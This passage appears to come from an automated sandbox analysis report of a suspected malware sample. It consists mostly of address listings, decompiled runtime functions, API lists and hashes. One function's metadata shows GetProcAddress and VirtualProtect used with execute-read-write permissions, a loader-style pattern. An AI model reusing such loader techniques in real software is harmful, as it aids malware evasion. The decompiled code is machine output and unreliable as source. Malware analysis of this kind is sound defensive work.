                                                                                                                                                                                            0x00401f95
                                                                                                                                                                                            0x00401f95
                                                                                                                                                                                            0x00401f9e
                                                                                                                                                                                            0x00401fa4
                                                                                                                                                                                            0x00401faa
                                                                                                                                                                                            0x00401faf
                                                                                                                                                                                            0x00401fb7
                                                                                                                                                                                            0x00401fc0
                                                                                                                                                                                            0x00401fc0
                                                                                                                                                                                            0x00401fc9
                                                                                                                                                                                            0x00401fcf
                                                                                                                                                                                            0x00401fd5
                                                                                                                                                                                            0x00401fda
                                                                                                                                                                                            0x00401fe2
                                                                                                                                                                                            0x00401feb
                                                                                                                                                                                            0x00401feb
                                                                                                                                                                                            0x00401fee
                                                                                                                                                                                            0x00401ff2
                                                                                                                                                                                            0x00401ff6
                                                                                                                                                                                            0x00401ffa
                                                                                                                                                                                            0x00401ffe
                                                                                                                                                                                            0x00402002
                                                                                                                                                                                            0x00402006
                                                                                                                                                                                            0x0040200a
                                                                                                                                                                                            0x0040200e
                                                                                                                                                                                            0x00402012
                                                                                                                                                                                            0x00402016
                                                                                                                                                                                            0x0040201a
                                                                                                                                                                                            0x0040201e
                                                                                                                                                                                            0x00402022
                                                                                                                                                                                            0x00402026
                                                                                                                                                                                            0x0040202a
                                                                                                                                                                                            0x0040203c
                                                                                                                                                                                            0x0040204d
                                                                                                                                                                                            0x00402060
                                                                                                                                                                                            0x0040206a
                                                                                                                                                                                            0x00402073
                                                                                                                                                                                            0x0040207d
                                                                                                                                                                                            0x00402086
                                                                                                                                                                                            0x00402092
                                                                                                                                                                                            0x0040209c
                                                                                                                                                                                            0x004020a6
                                                                                                                                                                                            0x004020af
                                                                                                                                                                                            0x004020b9
                                                                                                                                                                                            0x004020c6
                                                                                                                                                                                            0x004020cf
                                                                                                                                                                                            0x004020dc
                                                                                                                                                                                            0x004020ee
                                                                                                                                                                                            0x004020f8
                                                                                                                                                                                            0x00402101
                                                                                                                                                                                            0x00402036
                                                                                                                                                                                            0x00402039
                                                                                                                                                                                            0x00402039
                                                                                                                                                                                            0x00402110
                                                                                                                                                                                            0x00402119
                                                                                                                                                                                            0x00402122
                                                                                                                                                                                            0x00402128
                                                                                                                                                                                            0x0040212e
                                                                                                                                                                                            0x00402133
                                                                                                                                                                                            0x0040213b
                                                                                                                                                                                            0x00402144
                                                                                                                                                                                            0x00402144
                                                                                                                                                                                            0x0040214d
                                                                                                                                                                                            0x00402153
                                                                                                                                                                                            0x00402159
                                                                                                                                                                                            0x0040215e
                                                                                                                                                                                            0x00402166
                                                                                                                                                                                            0x0040216f
                                                                                                                                                                                            0x0040216f
                                                                                                                                                                                            0x00402178
                                                                                                                                                                                            0x0040217e
                                                                                                                                                                                            0x00402184
                                                                                                                                                                                            0x00402189
                                                                                                                                                                                            0x00402191
                                                                                                                                                                                            0x0040219a
                                                                                                                                                                                            0x0040219a
                                                                                                                                                                                            0x004021a3
                                                                                                                                                                                            0x004021a9
                                                                                                                                                                                            0x004021af
                                                                                                                                                                                            0x004021b4
                                                                                                                                                                                            0x004021bc
                                                                                                                                                                                            0x004021c5
                                                                                                                                                                                            0x004021c5
                                                                                                                                                                                            0x004021ce
                                                                                                                                                                                            0x004021d4
                                                                                                                                                                                            0x004021da
                                                                                                                                                                                            0x004021df
                                                                                                                                                                                            0x004021e7
                                                                                                                                                                                            0x004021f0
                                                                                                                                                                                            0x004021f0
                                                                                                                                                                                            0x004021f9
                                                                                                                                                                                            0x00402202
                                                                                                                                                                                            0x0040220b
                                                                                                                                                                                            0x00402211
                                                                                                                                                                                            0x00402217
                                                                                                                                                                                            0x0040221c
                                                                                                                                                                                            0x00402224
                                                                                                                                                                                            0x0040222d
                                                                                                                                                                                            0x0040222d
                                                                                                                                                                                            0x00402236
                                                                                                                                                                                            0x0040223c
                                                                                                                                                                                            0x00402242
                                                                                                                                                                                            0x00402247
                                                                                                                                                                                            0x0040224f
                                                                                                                                                                                            0x00402258
                                                                                                                                                                                            0x00402258
                                                                                                                                                                                            0x00402261
                                                                                                                                                                                            0x00402267
                                                                                                                                                                                            0x0040226d
                                                                                                                                                                                            0x00402272
                                                                                                                                                                                            0x0040227a
                                                                                                                                                                                            0x00402283
                                                                                                                                                                                            0x00402283
                                                                                                                                                                                            0x0040228c
                                                                                                                                                                                            0x00402292
                                                                                                                                                                                            0x00402298
                                                                                                                                                                                            0x0040229d
                                                                                                                                                                                            0x004022a5
                                                                                                                                                                                            0x004022ae
                                                                                                                                                                                            0x004022ae
                                                                                                                                                                                            0x004022b7
                                                                                                                                                                                            0x004022bd
                                                                                                                                                                                            0x004022c3
                                                                                                                                                                                            0x004022c8
                                                                                                                                                                                            0x004022d0
                                                                                                                                                                                            0x004022d9
                                                                                                                                                                                            0x004022d9
                                                                                                                                                                                            0x004022e2
                                                                                                                                                                                            0x004022eb
                                                                                                                                                                                            0x004022f4
                                                                                                                                                                                            0x004022fa
                                                                                                                                                                                            0x00402300
                                                                                                                                                                                            0x00402305
                                                                                                                                                                                            0x0040230d
                                                                                                                                                                                            0x00402316
                                                                                                                                                                                            0x00402316
                                                                                                                                                                                            0x0040231f
                                                                                                                                                                                            0x00402325
                                                                                                                                                                                            0x0040232b
                                                                                                                                                                                            0x00402330
                                                                                                                                                                                            0x00402338
                                                                                                                                                                                            0x00402341
                                                                                                                                                                                            0x00402341
                                                                                                                                                                                            0x0040234a
                                                                                                                                                                                            0x00402350
                                                                                                                                                                                            0x00402356
                                                                                                                                                                                            0x0040235b
                                                                                                                                                                                            0x00402363
                                                                                                                                                                                            0x0040236c
                                                                                                                                                                                            0x0040236c
                                                                                                                                                                                            0x00402375
                                                                                                                                                                                            0x0040237b
                                                                                                                                                                                            0x00402381
                                                                                                                                                                                            0x00402386
                                                                                                                                                                                            0x0040238e
                                                                                                                                                                                            0x00402397
                                                                                                                                                                                            0x00402397
                                                                                                                                                                                            0x004023a0
                                                                                                                                                                                            0x004023a6
                                                                                                                                                                                            0x004023ac
                                                                                                                                                                                            0x004023b1
                                                                                                                                                                                            0x004023b9
                                                                                                                                                                                            0x004023c2
                                                                                                                                                                                            0x004023c2
                                                                                                                                                                                            0x004023cb
                                                                                                                                                                                            0x004023d4
                                                                                                                                                                                            0x004023dd
                                                                                                                                                                                            0x004023e3
                                                                                                                                                                                            0x004023e9
                                                                                                                                                                                            0x004023ee
                                                                                                                                                                                            0x004023f6
                                                                                                                                                                                            0x004023ff
                                                                                                                                                                                            0x004023ff
                                                                                                                                                                                            0x00402408
                                                                                                                                                                                            0x0040240e
                                                                                                                                                                                            0x00402414
                                                                                                                                                                                            0x00402419
                                                                                                                                                                                            0x00402421
                                                                                                                                                                                            0x0040242a
                                                                                                                                                                                            0x0040242a
                                                                                                                                                                                            0x00402433
                                                                                                                                                                                            0x00402439
                                                                                                                                                                                            0x0040243f
                                                                                                                                                                                            0x00402444
                                                                                                                                                                                            0x0040244c
                                                                                                                                                                                            0x00402455
                                                                                                                                                                                            0x00402455
                                                                                                                                                                                            0x0040245e
                                                                                                                                                                                            0x00402464
                                                                                                                                                                                            0x0040246a
                                                                                                                                                                                            0x0040246f
                                                                                                                                                                                            0x00402477
                                                                                                                                                                                            0x00402480
                                                                                                                                                                                            0x00402480
                                                                                                                                                                                            0x00402489
                                                                                                                                                                                            0x0040248f
                                                                                                                                                                                            0x00402495
                                                                                                                                                                                            0x0040249a
                                                                                                                                                                                            0x004024a2
                                                                                                                                                                                            0x004024ab
                                                                                                                                                                                            0x004024ab
                                                                                                                                                                                            0x004024b4
                                                                                                                                                                                            0x004024bd
                                                                                                                                                                                            0x004024c6
                                                                                                                                                                                            0x004024cc
                                                                                                                                                                                            0x004024d2
                                                                                                                                                                                            0x004024d7
                                                                                                                                                                                            0x004024df
                                                                                                                                                                                            0x004024e8
                                                                                                                                                                                            0x004024e8
                                                                                                                                                                                            0x004024f1
                                                                                                                                                                                            0x004024f7
                                                                                                                                                                                            0x004024fd
                                                                                                                                                                                            0x00402502
                                                                                                                                                                                            0x0040250a
                                                                                                                                                                                            0x00402513
                                                                                                                                                                                            0x00402513
                                                                                                                                                                                            0x0040251c
                                                                                                                                                                                            0x00402522
                                                                                                                                                                                            0x00402528
                                                                                                                                                                                            0x0040252d
                                                                                                                                                                                            0x00402535
                                                                                                                                                                                            0x0040253e
                                                                                                                                                                                            0x0040253e
                                                                                                                                                                                            0x00402547
                                                                                                                                                                                            0x0040254d
                                                                                                                                                                                            0x00402553
                                                                                                                                                                                            0x00402558
                                                                                                                                                                                            0x00402560
                                                                                                                                                                                            0x00402569
                                                                                                                                                                                            0x00402569
                                                                                                                                                                                            0x00402572
                                                                                                                                                                                            0x00402578
                                                                                                                                                                                            0x0040257e
                                                                                                                                                                                            0x00402583
                                                                                                                                                                                            0x0040258b
                                                                                                                                                                                            0x00402594
                                                                                                                                                                                            0x00402594
                                                                                                                                                                                            0x0040259d
                                                                                                                                                                                            0x004025a6
                                                                                                                                                                                            0x004025af
                                                                                                                                                                                            0x004025b5
                                                                                                                                                                                            0x004025bb
                                                                                                                                                                                            0x004025c0
                                                                                                                                                                                            0x004025c8
                                                                                                                                                                                            0x004025d1
                                                                                                                                                                                            0x004025d1
                                                                                                                                                                                            0x004025da
                                                                                                                                                                                            0x004025e0
                                                                                                                                                                                            0x004025e6
                                                                                                                                                                                            0x004025eb
                                                                                                                                                                                            0x004025f3
                                                                                                                                                                                            0x004025fc
                                                                                                                                                                                            0x004025fc
                                                                                                                                                                                            0x00402605
                                                                                                                                                                                            0x0040260b
                                                                                                                                                                                            0x00402611
                                                                                                                                                                                            0x00402616
                                                                                                                                                                                            0x0040261e
                                                                                                                                                                                            0x00402627
                                                                                                                                                                                            0x00402627
                                                                                                                                                                                            0x00402630
                                                                                                                                                                                            0x00402636
                                                                                                                                                                                            0x0040263c
                                                                                                                                                                                            0x00402641
                                                                                                                                                                                            0x00402649
                                                                                                                                                                                            0x00402652
                                                                                                                                                                                            0x00402652
                                                                                                                                                                                            0x0040265b
                                                                                                                                                                                            0x00402661
                                                                                                                                                                                            0x00402667
                                                                                                                                                                                            0x0040266c
                                                                                                                                                                                            0x00402674
                                                                                                                                                                                            0x0040267d
                                                                                                                                                                                            0x0040267d
                                                                                                                                                                                            0x00402686
                                                                                                                                                                                            0x0040268f
                                                                                                                                                                                            0x00402698
                                                                                                                                                                                            0x0040269e
                                                                                                                                                                                            0x004026a4
                                                                                                                                                                                            0x004026a9
                                                                                                                                                                                            0x004026b1
                                                                                                                                                                                            0x004026ba
                                                                                                                                                                                            0x004026ba
                                                                                                                                                                                            0x004026c3
                                                                                                                                                                                            0x004026c9
                                                                                                                                                                                            0x004026cf
                                                                                                                                                                                            0x004026d4
                                                                                                                                                                                            0x004026dc
                                                                                                                                                                                            0x004026e5
                                                                                                                                                                                            0x004026e5
                                                                                                                                                                                            0x004026ee
                                                                                                                                                                                            0x004026f4
                                                                                                                                                                                            0x004026fa
                                                                                                                                                                                            0x004026ff
                                                                                                                                                                                            0x00402707
                                                                                                                                                                                            0x00402710
                                                                                                                                                                                            0x00402710
                                                                                                                                                                                            0x00402719
                                                                                                                                                                                            0x0040271f
                                                                                                                                                                                            0x00402725
                                                                                                                                                                                            0x0040272a
                                                                                                                                                                                            0x00402732
                                                                                                                                                                                            0x0040273b
                                                                                                                                                                                            0x0040273b
                                                                                                                                                                                            0x00402744
                                                                                                                                                                                            0x0040274a
                                                                                                                                                                                            0x00402750
                                                                                                                                                                                            0x00402755
                                                                                                                                                                                            0x0040275d
                                                                                                                                                                                            0x00402766
                                                                                                                                                                                            0x00402766
                                                                                                                                                                                            0x0040276f
                                                                                                                                                                                            0x00402778
                                                                                                                                                                                            0x00402781
                                                                                                                                                                                            0x00402787
                                                                                                                                                                                            0x0040278d
                                                                                                                                                                                            0x00402792
                                                                                                                                                                                            0x0040279a
                                                                                                                                                                                            0x004027a3
                                                                                                                                                                                            0x004027a3
                                                                                                                                                                                            0x004027ac
                                                                                                                                                                                            0x004027b2
                                                                                                                                                                                            0x004027b8
                                                                                                                                                                                            0x004027bd
                                                                                                                                                                                            0x004027c5
                                                                                                                                                                                            0x004027ce
                                                                                                                                                                                            0x004027ce
                                                                                                                                                                                            0x004027d7
                                                                                                                                                                                            0x004027dd
                                                                                                                                                                                            0x004027e3
                                                                                                                                                                                            0x004027e8
                                                                                                                                                                                            0x004027f0
                                                                                                                                                                                            0x004027f9
                                                                                                                                                                                            0x004027f9
                                                                                                                                                                                            0x00402802
                                                                                                                                                                                            0x00402808
                                                                                                                                                                                            0x0040280e
                                                                                                                                                                                            0x00402813
                                                                                                                                                                                            0x0040281b
                                                                                                                                                                                            0x00402824
                                                                                                                                                                                            0x00402824
                                                                                                                                                                                            0x0040282d
                                                                                                                                                                                            0x00402833
                                                                                                                                                                                            0x00402839
                                                                                                                                                                                            0x0040283e
                                                                                                                                                                                            0x00402846
                                                                                                                                                                                            0x0040284f
                                                                                                                                                                                            0x0040284f
                                                                                                                                                                                            0x00402852
                                                                                                                                                                                            0x00402856
                                                                                                                                                                                            0x0040285a
                                                                                                                                                                                            0x0040285e
                                                                                                                                                                                            0x00402862
                                                                                                                                                                                            0x00402866
                                                                                                                                                                                            0x0040286a
                                                                                                                                                                                            0x0040286e
                                                                                                                                                                                            0x00402872
                                                                                                                                                                                            0x00402876
                                                                                                                                                                                            0x0040287a
                                                                                                                                                                                            0x0040287e
                                                                                                                                                                                            0x00402882
                                                                                                                                                                                            0x00402886
                                                                                                                                                                                            0x00402898
                                                                                                                                                                                            0x004028a9
                                                                                                                                                                                            0x004028b3
                                                                                                                                                                                            0x004028c6
                                                                                                                                                                                            0x004028d3
                                                                                                                                                                                            0x004028dc
                                                                                                                                                                                            0x004028e6
                                                                                                                                                                                            0x004028ef
                                                                                                                                                                                            0x00402902
                                                                                                                                                                                            0x0040290b
                                                                                                                                                                                            0x00402915
                                                                                                                                                                                            0x0040291f
                                                                                                                                                                                            0x00402929
                                                                                                                                                                                            0x00402933
                                                                                                                                                                                            0x0040293d
                                                                                                                                                                                            0x00402950
                                                                                                                                                                                            0x0040295c
                                                                                                                                                                                            0x00402965
                                                                                                                                                                                            0x00402895
                                                                                                                                                                                            0x00402895
                                                                                                                                                                                            0x00402978
                                                                                                                                                                                            0x0040297b
                                                                                                                                                                                            0x00402990
                                                                                                                                                                                            0x004029a3
                                                                                                                                                                                            0x004029b0

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000053), ref: 00402972
                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000004), ref: 0040298A
                                                                                                                                                                                            • VirtualProtect.KERNELBASE(?,000000FB,00000040,00000000), ref: 004029A3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                            • String ID: ,$/$1$6$C$E$O$S$`ghv$c$n$t$w$NhvIhvPdhv
                                                                                                                                                                                            • API String ID: 2099061454-1301821488
                                                                                                                                                                                            • Opcode ID: db9b1652acbf82f970014281640f95a39b8928f6f0e74ca52690f7ef009c20de
                                                                                                                                                                                            • Instruction ID: c1d0cadc6033f5e5d0280f64f59870506d21eec9913133e9c41992e24b09aadf
                                                                                                                                                                                            • Opcode Fuzzy Hash: db9b1652acbf82f970014281640f95a39b8928f6f0e74ca52690f7ef009c20de
                                                                                                                                                                                            • Instruction Fuzzy Hash: 58B27D70A06159DBEB108B95FA982EDBF71FB91341F5281A5D1D8360E9C3B811B2CF1E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040EA95 Relevance: 6.1, APIs: 4, Instructions: 93memoryCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 446 40ea95-40eaa8 call 4082e4 449 40ead8-40eae3 446->449 450 40eaaa-40eab7 446->450 452 40eae5-40eae7 449->452 453 40eae8-40eaf0 449->453 450->449 451 40eab9-40eace call 409c95 call 4094ac 450->451 477 40ead1-40ead3 451->477 452->453 454 40eaf2-40eaf9 453->454 455 40eb5b-40eb5d 453->455 457 40eb46-40eb48 454->457 458 40eafb-40eb0d 454->458 460 40ebab 455->460 461 40eb5f-40eb65 455->461 457->460 467 40eb4a-40eb59 RtlAllocateHeap 457->467 458->457 464 40eb0f-40eb37 call 40a28a call 40b6b4 call 40eb91 458->464 465 40ebad-40ebb2 call 408329 460->465 462 40eb67-40eb70 call 4088c2 461->462 463 40eb9a-40eb9c 461->463 462->453 478 40eb76-40eb7b 462->478 463->460 470 40eb9e-40eba3 463->470 464->467 484 40eb39-40eb43 call 409fb0 464->484 467->455 470->460 475 40eba5 470->475 475->460 477->465 478->477 480 40eb81-40eb87 478->480 480->477 484->457
                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                            			E0040EA95(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				long _t23;
				long _t24;
				void* _t25;
				long _t31;
				signed int _t32;
				signed int _t33;
				signed int _t39;
				signed int _t45;
				long _t49;
				void* _t52;
				void* _t53;

				_push(0xc);
				_push(0x412848);
				E004082E4(__ebx, __edi, __esi);
				_t39 =  *(_t52 + 8);
				if(_t39 <= 0) {
					L4:
					_t49 = _t39 *  *(_t52 + 0xc);
					 *(_t52 + 8) = _t49;
					__eflags = _t49;
					if(_t49 == 0) {
						_t49 = 1;
						__eflags = 1;
					}
					do {
						_t38 = 0;
						 *(_t52 - 0x1c) = 0;
						__eflags = _t49 - 0xffffffe0;
						if(_t49 > 0xffffffe0) {
							L13:
							__eflags = _t38;
							if(_t38 != 0) {
								L21:
								_t21 = _t38;
								L22:
								return E00408329(_t21);
							}
							__eflags =  *0x438264; // 0x0
							if(__eflags == 0) {
								__eflags = _t38;
								if(_t38 == 0) {
									_t23 =  *(_t52 + 0x10);
									__eflags = _t23;
									if(_t23 != 0) {
										 *_t23 = 0xc;
									}
								}
								goto L21;
							}
							goto L15;
						}
						__eflags =  *0x4386b4 - 3;
						if( *0x4386b4 != 3) {
							L11:
							__eflags = _t38;
							if(_t38 != 0) {
								goto L21;
							}
							L12:
							_t25 = RtlAllocateHeap( *0x438074, 8, _t49); // executed
							_t38 = _t25;
							goto L13;
						}
						_t49 = _t49 + 0x0000000f & 0xfffffff0;
						 *(_t52 + 0xc) = _t49;
						__eflags =  *(_t52 + 8) -  *0x4386a0; // 0x0
						if(__eflags > 0) {
							goto L11;
						}
						E0040A28A(0, 0, 4);
						 *((intOrPtr*)(_t52 - 4)) = 0;
						_push( *(_t52 + 8));
						 *(_t52 - 0x1c) = E0040B6B4();
						 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
						E0040EB91();
						_t38 =  *(_t52 - 0x1c);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L12;
						}
						E00409FB0(0, _t38, 0,  *(_t52 + 8));
						_t53 = _t53 + 0xc;
						goto L11;
						L15:
						_t24 = E004088C2(_t49);
						__eflags = _t24;
					} while (_t24 != 0);
					_t31 =  *(_t52 + 0x10);
					__eflags = _t31;
					if(_t31 != 0) {
						 *_t31 = 0xc;
					}
					L3:
					_t21 = 0;
					goto L22;
				}
				_t32 = 0xffffffe0;
				_t33 = _t32 / _t39;
				_t45 = _t32 % _t39;
				asm("sbb eax, eax");
				_t58 = _t33 + 1;
				if(_t33 + 1 != 0) {
					goto L4;
				} else {
					 *((intOrPtr*)(E00409C95(_t58))) = 0xc;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004094AC(_t45, 0, __esi);
					goto L3;
				}
			}















                                                                                                                                                                                            0x0040ea95
                                                                                                                                                                                            0x0040ea97
                                                                                                                                                                                            0x0040ea9c
                                                                                                                                                                                            0x0040eaa1
                                                                                                                                                                                            0x0040eaa8
                                                                                                                                                                                            0x0040ead8
                                                                                                                                                                                            0x0040eadc
                                                                                                                                                                                            0x0040eade
                                                                                                                                                                                            0x0040eae1
                                                                                                                                                                                            0x0040eae3
                                                                                                                                                                                            0x0040eae7
                                                                                                                                                                                            0x0040eae7
                                                                                                                                                                                            0x0040eae7
                                                                                                                                                                                            0x0040eae8
                                                                                                                                                                                            0x0040eae8
                                                                                                                                                                                            0x0040eaea
                                                                                                                                                                                            0x0040eaed
                                                                                                                                                                                            0x0040eaf0
                                                                                                                                                                                            0x0040eb5b
                                                                                                                                                                                            0x0040eb5b
                                                                                                                                                                                            0x0040eb5d
                                                                                                                                                                                            0x0040ebab
                                                                                                                                                                                            0x0040ebab
                                                                                                                                                                                            0x0040ebad
                                                                                                                                                                                            0x0040ebb2
                                                                                                                                                                                            0x0040ebb2
                                                                                                                                                                                            0x0040eb5f
                                                                                                                                                                                            0x0040eb65
                                                                                                                                                                                            0x0040eb9a
                                                                                                                                                                                            0x0040eb9c
                                                                                                                                                                                            0x0040eb9e
                                                                                                                                                                                            0x0040eba1
                                                                                                                                                                                            0x0040eba3
                                                                                                                                                                                            0x0040eba5
                                                                                                                                                                                            0x0040eba5
                                                                                                                                                                                            0x0040eba3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040eb9c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040eb65
                                                                                                                                                                                            0x0040eaf2
                                                                                                                                                                                            0x0040eaf9
                                                                                                                                                                                            0x0040eb46
                                                                                                                                                                                            0x0040eb46
                                                                                                                                                                                            0x0040eb48
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040eb4a
                                                                                                                                                                                            0x0040eb53
                                                                                                                                                                                            0x0040eb59
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040eb59
                                                                                                                                                                                            0x0040eafe
                                                                                                                                                                                            0x0040eb01
                                                                                                                                                                                            0x0040eb07
                                                                                                                                                                                            0x0040eb0d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040eb11
                                                                                                                                                                                            0x0040eb17
                                                                                                                                                                                            0x0040eb1a
                                                                                                                                                                                            0x0040eb23
                                                                                                                                                                                            0x0040eb26
                                                                                                                                                                                            0x0040eb2d
                                                                                                                                                                                            0x0040eb32
                                                                                                                                                                                            0x0040eb35
                                                                                                                                                                                            0x0040eb37
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040eb3e
                                                                                                                                                                                            0x0040eb43
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040eb67
                                                                                                                                                                                            0x0040eb68
                                                                                                                                                                                            0x0040eb6e
                                                                                                                                                                                            0x0040eb6e
                                                                                                                                                                                            0x0040eb76
                                                                                                                                                                                            0x0040eb79
                                                                                                                                                                                            0x0040eb7b
                                                                                                                                                                                            0x0040eb81
                                                                                                                                                                                            0x0040eb81
                                                                                                                                                                                            0x0040ead1
                                                                                                                                                                                            0x0040ead1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040ead1
                                                                                                                                                                                            0x0040eaac
                                                                                                                                                                                            0x0040eaaf
                                                                                                                                                                                            0x0040eaaf
                                                                                                                                                                                            0x0040eab4
                                                                                                                                                                                            0x0040eab6
                                                                                                                                                                                            0x0040eab7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040eab9
                                                                                                                                                                                            0x0040eabe
                                                                                                                                                                                            0x0040eac4
                                                                                                                                                                                            0x0040eac5
                                                                                                                                                                                            0x0040eac6
                                                                                                                                                                                            0x0040eac7
                                                                                                                                                                                            0x0040eac8
                                                                                                                                                                                            0x0040eac9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040eace

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __lock.LIBCMT ref: 0040EB11
                                                                                                                                                                                            • ___sbh_alloc_block.LIBCMT ref: 0040EB1D
                                                                                                                                                                                            • _memset.LIBCMT ref: 0040EB3E
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00412848,0000000C,0040AA72,004062E5,?,00000000,00000000,00000000,?,00407F8F,00000001,00000214,?,004062E5), ref: 0040EB53
                                                                                                                                                                                              • Part of subcall function 00409C95: __getptd_noexit.LIBCMT ref: 00409C95
                                                                                                                                                                                              • Part of subcall function 004094AC: __decode_pointer.LIBCMT ref: 004094B7
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3771094184-0
                                                                                                                                                                                            • Opcode ID: 6452a810e265470f5f46d7d96b8380f7b17f0fbb4cd4b244a08929e90c976f2f
                                                                                                                                                                                            • Instruction ID: 0a47ad2e43b4322e670d917b0ea12b1e3f2155c53e4c855121d0586055f0087c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6452a810e265470f5f46d7d96b8380f7b17f0fbb4cd4b244a08929e90c976f2f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B21D471A006009ADB21EF668CC195E7771FB94360F284A3BF856BA3C1DA7C9D608B4C
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406048 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 487 406048-4062ce 489 4062dd-4062e8 call 4087e9 487->489 492 4062d0-4062db call 4088c2 489->492 493 4062ea-4062eb 489->493 492->489 496 4062ec-4062f8 492->496 497 406313-40632a call 4062a9 call 4088ea 496->497 498 4062fa-406312 call 40625c call 408783 496->498 498->497
                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                            			E00406048(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr _v0;
				signed int _v12;
				char _v20;
				void* __ebp;
				void* _t31;
				signed int _t32;
				signed int _t36;
				intOrPtr _t39;
				intOrPtr _t41;
				void* _t47;
				intOrPtr* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				void* _t60;
				intOrPtr* _t62;
				void* _t65;
				void* _t67;

				_t60 = __edi;
				_t59 = __edx;
				_t47 = __ebx;
				_pop(_t64);
				_t65 = _t67;
				while(1) {
					_t31 = E004087E9(_t47, _t59, _t60, _v0); // executed
					if(_t31 != 0) {
						return _t31;
					}
					_t32 = E004088C2(_v0);
					__eflags = _t32;
					if(_t32 == 0) {
						__eflags =  *0x437c08 & 0x00000001;
						if(( *0x437c08 & 0x00000001) == 0) {
							 *0x437c08 =  *0x437c08 | 0x00000001;
							__eflags =  *0x437c08;
							E0040625C(0x437bfc);
							E00408783( *0x437c08, 0x40f8b3);
						}
						_t50 =  &_v20;
						E004062A9(_t50, 0x437bfc);
						E004088EA( &_v20, 0x4125a4);
						asm("int3");
						_push(_t65);
						_t36 = _v12;
						_push(0x437bfc);
						_t62 = _t50;
						 *((char*)(_t62 + 0xc)) = 0;
						__eflags = _t36;
						if(__eflags != 0) {
							 *_t62 =  *_t36;
							_t29 = _t36 + 4; // 0x406277
							 *((intOrPtr*)(_t62 + 4)) =  *_t29;
						} else {
							_t39 = E00407FDD(_t47, __eflags);
							 *((intOrPtr*)(_t62 + 8)) = _t39;
							 *_t62 =  *((intOrPtr*)(_t39 + 0x6c));
							 *((intOrPtr*)(_t62 + 4)) =  *((intOrPtr*)(_t39 + 0x68));
							__eflags =  *_t62 -  *0x437348;
							if( *_t62 !=  *0x437348) {
								_t56 =  *0x437264; // 0xfffffffe
								__eflags =  *(_t39 + 0x70) & _t56;
